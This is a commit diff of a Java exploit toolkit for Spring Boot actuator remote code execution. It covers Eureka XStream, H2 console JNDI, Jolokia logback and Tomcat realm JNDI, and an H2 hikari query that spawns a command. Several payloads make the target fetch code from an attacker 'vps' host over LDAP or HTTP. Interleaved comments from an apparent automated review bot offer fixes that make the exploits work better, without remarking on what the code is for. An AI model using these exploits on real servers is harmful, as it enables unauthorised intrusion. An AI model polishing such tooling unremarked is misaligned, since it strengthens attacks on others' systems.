
Commit c971699

committed
多种RCE
1 parent fb86cc3 commit c971699

21 files changed

Lines changed: 1248 additions & 28 deletions
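--- a/com/drops/exp/EurekaXstreamRCEExp.java
+++ b/com/drops/exp/EurekaXstreamRCEExp.java
@@ -0,0 +1,66 @@
+package com.drops.exp;
+
+import com.drops.exp.util.EnvPost;
+import com.drops.exp.util.RefreshPost;
+import com.drops.utils.URLUtil;
+
+/**
+* @ClassName: EurekaXstreamRCE
+* @Description: TODO
+* @Author: Summer
+* @Date: 2021/7/29 11:09
+* @Version: v1.0.0
+* @Description:
+**/
+public class EurekaXstreamRCEExp {
+static String bobyV1 = "eureka.client.serviceUrl.defaultZone=";
+static String bobyV2 = "{\"name\":\"eureka.client.serviceUrl.defaultZone\",\"value\":\"";
+
+/**
+* @Description:
+* @param target http://127.0.0.1:9092/
+* @param vps http://127.0.0.1:9092/example
+*
+* @return:
+*/
+public static boolean setRCEV1(String target, String vps, String port){
+String boby = bobyV1 + vps + port + "/example";
+System.out.println(boby);
+if (EnvPost.isPostEnv(target)){
+if (RefreshPost.isRefreshPost(target)){
+if (EnvPost.PostEnv(target,boby)){
+if (RefreshPost.isRefreshPost(target)){
+System.out.println("EurekaXstreamRCEExp利用成功");
+}
+return false;
+}
+}
+}
+return false;
+}
+
+public static boolean setRCEV2(String target, String vps, String port){
+String boby = bobyV2 + vps + port + "/example\"}";
+System.out.println(boby);
+if (EnvPost.isPostEnvV2(target)){
+if (RefreshPost.isRefreshPostV2(target)){
+if (EnvPost.PostEnvV2(target,boby)){
+if (RefreshPost.isRefreshPostV2(target)){
+System.out.println("EurekaXstreamRCEExp利用成功");
+}
+return false;
+}
+}
+}
+return false;
+}
+
+public static void main(String[] args) {
+String target = "127.0.0.1:9093";
+String vps = "127.0.0.1:6789";
+String port = "6789";
+EurekaXstreamRCEExp.setRCEV1(URLUtil.normalizeURL(target),
+vps, port);
+
+}
+}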
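Review bot: `setRCEV1` and `setRCEV2` return `false` on every path, including the branch that prints the success message (file lines 33 and 49), so the boolean return carries no information and a caller cannot distinguish success from failure. Return `true` where the success message is printed: `System.out.println("EurekaXstreamRCEExp利用成功"); return true;` in both methods. The package-visible mutable fields `bobyV1`/`bobyV2` (file lines 16–17) should be `private static final`, and the identifier `boby` is a typo for `body` that recurs across this commit. The class Javadoc still reads `@Description: TODO` and the method Javadoc has an empty `@Description:`/`@return:`; replace them with a one-sentence summary such as `/** Checks the target's env and refresh endpoints, posts the property, and reports whether every step answered as expected. */`.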
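--- a/com/drops/exp/H2DatabaseConsoleJNDIRCEEXP.java
+++ b/com/drops/exp/H2DatabaseConsoleJNDIRCEEXP.java
@@ -0,0 +1,39 @@
+package com.drops.exp;
+
+import com.drops.exp.util.H2DatabaseUtil;
+import com.drops.utils.HTTPUtils;
+
+/**
+* @ClassName: H2DatabaseConsoleJNDIRCEEXP
+* @Description: TODO
+* @Author: Summer
+* @Date: 2021/7/30 9:56
+* @Version: v1.0.0
+* @Description:
+**/
+public class H2DatabaseConsoleJNDIRCEEXP {
+
+
+public static boolean hasH2DatabaseConsoleJNDIRCE(String target,String vps, String port,boolean version) {
+String boby = "language=en&setting=Generic+H2+(Embedded)&name=Generic+H2+(Embedded)&driver=javax.naming.InitialContext&url=ldap:/" + vps + ":" + port +"/#JNDIObject&user=&password=";
+
+if (version){
+if (H2DatabaseUtil.hasH2Database(target,version)){
+String path = H2DatabaseUtil.getJsessionid(target);
+if(HTTPUtils.postRequestV1(target,path,boby).getStatus() == 200){
+return true;
+}
+}
+}else {
+if (H2DatabaseUtil.hasH2Database(target,version)){
+String path = H2DatabaseUtil.getJsessionid(target);
+if(HTTPUtils.postRequestV2(target,path,boby).getStatus() == 200){
+return true;
+}
+}
+}
+
+
+return false;
+}
+}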
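Review bot: The two branches of `if (version)` (file lines 20–34) are identical except for `postRequestV1` versus `postRequestV2`, so the `hasH2Database` check and the `getJsessionid` lookup are written twice. Perform them once and select the request variant in a single expression, e.g. `int status = version ? HTTPUtils.postRequestV1(target, path, boby).getStatus() : HTTPUtils.postRequestV2(target, path, boby).getStatus(); return status == 200;`. The boolean `version` parameter is never explained; add Javadoc in place of `@Description: TODO` stating that `true` selects the V1 request variant and `false` the V2 variant, and that the method returns `true` only on an HTTP 200. Rename `boby` to `body`.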
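--- a/com/drops/exp/JolokiaLogbackRCEEXP.java
+++ b/com/drops/exp/JolokiaLogbackRCEEXP.java
@@ -0,0 +1,43 @@
+package com.drops.exp;
+
+import cn.hutool.http.HttpResponse;
+import com.drops.exp.util.JolokiaUtil;
+import com.drops.utils.HTTPUtils;
+import com.drops.utils.ResponseUtil;
+
+/**
+* @ClassName: JolokiaLogback
+* @Description: TODO
+* @Author: Summer
+* @Date: 2021/7/29 14:50
+* @Version: v1.0.0
+* @Description:
+**/
+public class JolokiaLogbackRCEEXP {
+
+public static boolean hasJolokiaLogbackRCE(String target, String vps, String port, boolean version) {
+
+
+String path = "/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/" + vps
++ "!/example.xml";
+
+if (version){
+if (JolokiaUtil.hasMbeans(target)){
+int result = HTTPUtils.getRequest(target + path).getStatus();
+if (result == 200){
+return true;
+}
+}
+}else {
+if (JolokiaUtil.hasMbeansV2(target)){
+int result = HTTPUtils.getRequest(target + "/actuator" + path).getStatus();
+if (result == 200){
+return true;
+}
+}
+}
+
+return false;
+
+}
+}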
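Review bot: `HttpResponse` and `ResponseUtil` (file lines 3 and 6) are imported but never referenced, and the `port` parameter of `hasJolokiaLogbackRCE` is never read, so the signature promises more than the method consumes. Drop the two imports; `port` can only be removed if no other caller among the 21 changed files passes it, so confirm before changing the public signature. The two branches at file lines 24–38 differ only in the `/actuator` prefix and the `hasMbeans`/`hasMbeansV2` guard; write `String base = version ? target : target + "/actuator";` and keep one `HTTPUtils.getRequest(base + path).getStatus() == 200` check. The `@ClassName: JolokiaLogback` tag does not match the class name `JolokiaLogbackRCEEXP`, and `@Description: TODO` should become a one-sentence summary.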
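--- a/com/drops/exp/JolokiaRealmRCEEXP.java
+++ b/com/drops/exp/JolokiaRealmRCEEXP.java
@@ -0,0 +1,87 @@
+package com.drops.exp;
+
+import com.drops.exp.util.JolokiaUtil;
+import com.drops.utils.HTTPUtils;
+
+/**
+* @ClassName: JolokiaRealmRCEEXP
+* @Description: TODO
+* @Author: Summer
+* @Date: 2021/7/29 15:20
+* @Version: v1.0.0
+* @Description:
+**/
+public class JolokiaRealmRCEEXP {
+
+public static boolean hasJolokiaRealmRCE(String target, String vps, String port, boolean version) {
+
+
+
+String create_realm = " {\n" +
+" \"mbean\": \"Tomcat:type=MBeanFactory\",\n" +
+" \"type\": \"EXEC\",\n" +
+" \"operation\": \"createJNDIRealm\",\n" +
+" \"arguments\": [\"Tomcat:type=Engine\"]\n" +
+"}";
+
+String wirte_factory = " {\n" +
+" \"mbean\": \"Tomcat:realmPath=/realm0,type=Realm\",\n" +
+" \"type\": \"WRITE\",\n" +
+" \"attribute\": \"contextFactory\",\n" +
+" \"value\": \"com.sun.jndi.rmi.registry.RegistryContextFactory\"\n" +
+"}";
+// 设置 http
+String write_url = "{\n" +
+" \"mbean\": \"Tomcat:realmPath=/realm0,type=Realm\",\n" +
+" \"type\": \"WRITE\",\n" +
+" \"attribute\": \"connectionURL\",\n" +
+" \"value\": \"ldap://" + vps + ":1389/#JNDIObject\"\n" +
+"}";
+
+String stop = "{\n" +
+" \"mbean\": \"Tomcat:realmPath=/realm0,type=Realm\",\n" +
+" \"type\": \"EXEC\",\n" +
+" \"operation\": \"stop\",\n" +
+" \"arguments\": []\n" +
+"}";
+
+String start = "{\n" +
+" \"mbean\": \"Tomcat:realmPath=/realm0,type=Realm\",\n" +
+" \"type\": \"EXEC\",\n" +
+" \"operation\": \"start\",\n" +
+" \"arguments\": []\n" +
+"}";
+
+String[] poc = new String[]{create_realm, wirte_factory, write_url, stop, start};
+
+
+if (version){
+if (JolokiaUtil.hasMbeansV3(target)){
+for (String p: poc){
+if (
+HTTPUtils.postRequestV1(target, "/jolokia").getStatus() != 200
+){
+return false;
+}
+}
+return true;
+}
+}else {
+if (JolokiaUtil.hasMbeansV4(target)){
+for (String p: poc){
+if (
+HTTPUtils.postRequestV1(target, "/actuator/jolokia").getStatus() != 200
+){
+return false;
+}
+}
+return true;
+}
+}
+
+
+
+return false;
+}
+
+}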
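Review bot: The locals `create_realm`, `wirte_factory` and `write_url` (file lines 20–39) use snake_case, and `wirte_factory` is misspelled, where every other identifier in this commit is lowerCamelCase; rename them `createRealm`, `writeFactory` and `writeUrl`. The five JSON literals are built by string concatenation with `\n` and embedded quotes across thirty lines; the file's Java version is not visible here, but if it is 15 or later a text block (`"""`) per literal would make each one readable without changing its content. The `port` parameter is never read in the method body, which is worth a comment or a signature review. The class Javadoc still carries `@Description: TODO`; replace it with a summary of what `version` selects (the `hasMbeansV3`/`/jolokia` path versus the `hasMbeansV4`/`/actuator/jolokia` path).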
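--- a/com/drops/exp/RestartH2DatabaseQueryRCEEXP.java
+++ b/com/drops/exp/RestartH2DatabaseQueryRCEEXP.java
@@ -0,0 +1,44 @@
+package com.drops.exp;
+
+import com.drops.exp.util.EnvPost;
+import com.drops.exp.util.H2DatabaseUtil;
+import com.drops.exp.util.RefreshPost;
+
+/**
+* @ClassName: RestartH2DatabaseQueryRCEEXP
+* @Description: TODO
+* @Author: Summer
+* @Date: 2021/7/30 9:47
+* @Version: v1.0.0
+* @Description:
+**/
+public class RestartH2DatabaseQueryRCEEXP {
+
+public static boolean hasRestartH2DatabaseQueryRCE(String target,boolean version) {
+String property1 = "spring.datasource.hikari.connection-test-query=CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');";
+String property2 = "{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');\"}";
+
+if (version) {
+if (EnvPost.isPostEnv(target)) {
+if (EnvPost.PostEnv(target, property1)) {
+if (RefreshPost.isRefreshPost(target)) {
+return true;
+}
+}
+}
+} else {
+if (H2DatabaseUtil.hasH2Database(target,version)){
+if (EnvPost.isPostEnvV2(target)) {
+if (EnvPost.PostEnvV2(target, property2)) {
+if (RefreshPost.isRefreshPostV2(target)) {
+return true;
+}
+}
+}
+}
+}
+
+return false;
+}
+
+}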
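Review bot: `hasRestartH2DatabaseQueryRCE` has no Javadoc beyond the `@Description: TODO` placeholder, and the meaning of the boolean `version` parameter has to be reverse-engineered from the two branches at file lines 21–39. Document it, e.g. `/** version=true: isPostEnv -> PostEnv -> isRefreshPost; version=false: hasH2Database -> isPostEnvV2 -> PostEnvV2 -> isRefreshPostV2. Returns true only when every step in the selected chain succeeds. */`. The four-deep nested `if` blocks each reduce to a short-circuit conjunction with identical behaviour: `return EnvPost.isPostEnv(target) && EnvPost.PostEnv(target, property1) && RefreshPost.isRefreshPost(target);` for the first branch and the equivalent four-term `&&` chain for the second. Note that `PostEnv`/`PostEnvV2` return boxed `Boolean`, so the `&&` form relies on auto-unboxing exactly as the existing `if` does.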
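--- a/com/drops/exp/util/EnvPost.java
+++ b/com/drops/exp/util/EnvPost.java
@@ -0,0 +1,81 @@
+package com.drops.exp.util;
+
+import cn.hutool.http.HttpResponse;
+import com.drops.utils.HTTPUtils;
+import com.drops.utils.ResponseUtil;
+import com.drops.utils.URLUtil;
+
+/**
+* @ClassName: EnvPost
+* @Description: TODO
+* @Author: Summer
+* @Date: 2021/7/29 11:10
+* @Version: v1.0.0
+* @Description:
+**/
+public class EnvPost {
+
+/**
+* @Description: env
+* @param target
+* @param boby
+*
+* @return:
+*/
+public static Boolean PostEnv(String target, String boby){
+if (isPostEnv(target)) {
+HttpResponse result = HTTPUtils.postRequestV1(target, "env", boby);
+if (ResponseUtil.getStats(result) == 200) {
+if (ResponseUtil.getBoby(result).isEmpty()) {
+System.out.println("返回包状态码 200,但返回包内容为null!请手工验证是否成功!");
+return true;
+}
+return true;
+} else {
+System.out.println("返回包状态码:" + ResponseUtil.getStats(result));
+System.out.println(boby + " 属性设置失败!");
+}
+}
+return false;
+}
+
+public static Boolean PostEnvV2(String target, String boby){
+if (isPostEnv(target)) {
+HttpResponse result = HTTPUtils.postRequestV2(target, "actuator/env", boby);
+if (ResponseUtil.getStats(result) == 200) {
+if (ResponseUtil.getBoby(result).isEmpty()) {
+System.out.println("返回包状态码 200,但返回包内容为null!请手工验证是否成功!");
+return true;
+}
+return true;
+} else {
+System.out.println("返回包状态码:" + ResponseUtil.getStats(result));
+System.out.println(boby + " 属性设置失败!");
+}
+}
+return false;
+}
+
+/**
+* @Description: 验证env端口是否存活,能否接受post请求
+* @param target
+*
+* @return:
+*/
+public static boolean isPostEnv(String target){
+HttpResponse result = HTTPUtils.postRequestV1(target,"env");
+if (ResponseUtil.getStats(result) == 200){
+return true;
+}
+return false;
+}
+
+public static boolean isPostEnvV2(String target){
+HttpResponse result = HTTPUtils.postRequestV2(target,"actuator/env");
+if (ResponseUtil.getStats(result) == 200){
+return true;
+}
+return false;
+}
+
+}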
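Review bot: In `PostEnv` (file lines 28–33) and `PostEnvV2` (file lines 45–50) both the inner `if (...isEmpty())` branch and the fall-through `return true`, so the empty-body check only affects what is printed and the nested `return` is dead weight; write it as `if (ResponseUtil.getBoby(result).isEmpty()) { System.out.println("返回包状态码 200,但返回包内容为null!请手工验证是否成功!"); } return true;`. `PostEnv`/`PostEnvV2` return boxed `Boolean` while `isPostEnv`/`isPostEnvV2` return primitive `boolean`, and the former two use UpperCamelCase method names; making all four `boolean` and renaming to `postEnv`/`postEnvV2` is a public-signature change, so the callers in `EurekaXstreamRCEExp` and `RestartH2DatabaseQueryRCEEXP` in this same commit would need updating. `isPostEnv` and `isPostEnvV2` each reduce to `return ResponseUtil.getStats(result) == 200;`. `URLUtil` (file line 6) is imported but unused, and the class Javadoc still reads `@Description: TODO`.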
